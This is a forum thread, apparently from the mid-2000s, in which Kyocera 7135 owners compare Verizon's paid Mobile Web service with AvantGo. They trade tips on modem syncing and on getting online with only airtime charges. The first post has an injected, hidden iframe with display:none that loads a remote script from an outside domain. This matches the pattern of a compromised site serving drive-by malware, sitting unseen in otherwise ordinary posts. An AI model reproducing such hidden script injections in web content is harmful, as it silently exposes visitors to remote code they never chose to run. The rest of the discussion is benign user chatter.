+ Reply to Thread

Who Has Verizon Mobile Web On Their 7135

If so, do you like it? I like avantgo better but I have Mac and they don't support it.

I'm really not liking the Mobile Web.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Who Has Verizon Online On Their 7135

Originally posted by RUYORK
    If so, do you like it? I like avantgo better but I have Mac and they don't support it.

I'm really not liking Verizon Online.
    I've never heard of "Verizon Online"...
    Please visit my picture site: Robert-O-Rama :)

Re: Who Has Verizon Online On Their 7135

I'm really not liking Verizon Online.
    I use Avantgo and like it a lot. I use it extensively whenever I am traveling and have no interest in changing.
    Dave

Re: Re: Who Has Verizon Online On Their 7135

Originally posted by Robert K.
    I've never heard of "Verizon Online"...
    Sorry, meant Mobile Web...

mobile web

is mobile web free like it was on 6135? how do you connect to advantgo? is there a charge to get access from verizon?

Thanks!

ps hi all its been a longtime!

wabbitt

Re: mobile web

Originally posted by sillyrabbitt
    is mobile web free like it was on 6135? how do you connect to advantgo? is there a charge to get access from verizon?

Thanks!

ps hi all its been a longtime!

wabbitt
    They charge about 7 dollars for it and it really sucks.

Avantgo is nice because you can get full web pages. Do a sync in the morning and you're all set.!

You don't need Mobile Web to get on the internet with the 7135. You can use the EIS browser or a different one. I use that and also Mobile Mail. Also use the phone as a modem for my laptop. Doesn't cost me anything but minutes.

You can also update your Advantgo information away from the computer. Just do a modem sync.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Originally posted by tmwebsites
    You don't need Mobile Web to get on the internet with the 7135. You can use the EIS browser or a different one. I use that and also Mobile Mail. Also use the phone as a modem for my laptop. Doesn't cost me anything but minutes.

You can also update your Advantgo information away from the computer. Just do a modem sync.

And all I need is the America's Choice voice "only" plan as I have?

And what # do I call to sync it?

Fully Converged

And all I need is the America's Choice voice "only" plan as I have?
    Yes, you just need to configure Q2N for your Network setting in PDA preferences and you're set to go online. I had Verizon Mobile Web eons ago (back in my web enabled StarTac days) pre 6135 and never liked it.
    From the Middle of the Sea ;-)

Kool and the gang... I'll try it.

May I never use VZ Mobile web again...

The only charges incurred are airtime charges?

How come they don't let you know this?

I'm only really concerned about Avantgo. I can't sync for some reason...

I got it!!!

I have problems with Advantgo synching properly. I think it's on their site's side. Sometimes I have to sync it away from the computer. If you have your QNC or EN web connection setup correct you can select modem sync from the Channels menu in the program. It can be pretty slow with QNC if you have a lot of channels in your profile.

Seems like a lot of the Verizon reps out there are selling people Mobile Web when they really don't need it.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Fully Converged
    Just synced my phone on Avantgo with EN and it was pretty quick; I was impressed.
    From the Middle of the Sea ;-)

This is probably Verizons Mobile Web plus

Verizon had a great service called mobile web plus (OmniSky's OneTouch software/Blazer). It contaned most of the sites ready for quick retreivals through their proxy server including email with real attachments. My favorite feature was the onetap integration with the super pages phone lookup,mapping,add to addressbook,dial,shop nearby,traffic checks. Onetap let you highlight anything and do a lookup by just moving the stylus from the graffiti pads menu icon to the home icon.

YES - I KNOW YOU CAN DO ALL THIS THROUGH THE WEB but you can't connect the information retreived on a web page automatically with your PIM apps like this software provided. And many service with palm content require subscription fees.

And NO the web browser that comes with the 7135 sucks. So does Xiino. So viewing the full web pages is not always acceptable.

I had to get rid of this software and service because their tech support group could not understand why on the 7135 it would automatically disconnect the modem after every retreival. I now use directory assistant that polls the 555-1212 database but this program is a poor substitute. Most other PQA apps are useless also. so I'm stuck with all my bookmarked pages.

BTW - it also came with 100 free txt messages per month. All this for $6.95 extra.

If they ever get this working on the 7135 I would probably subscribe for the service again.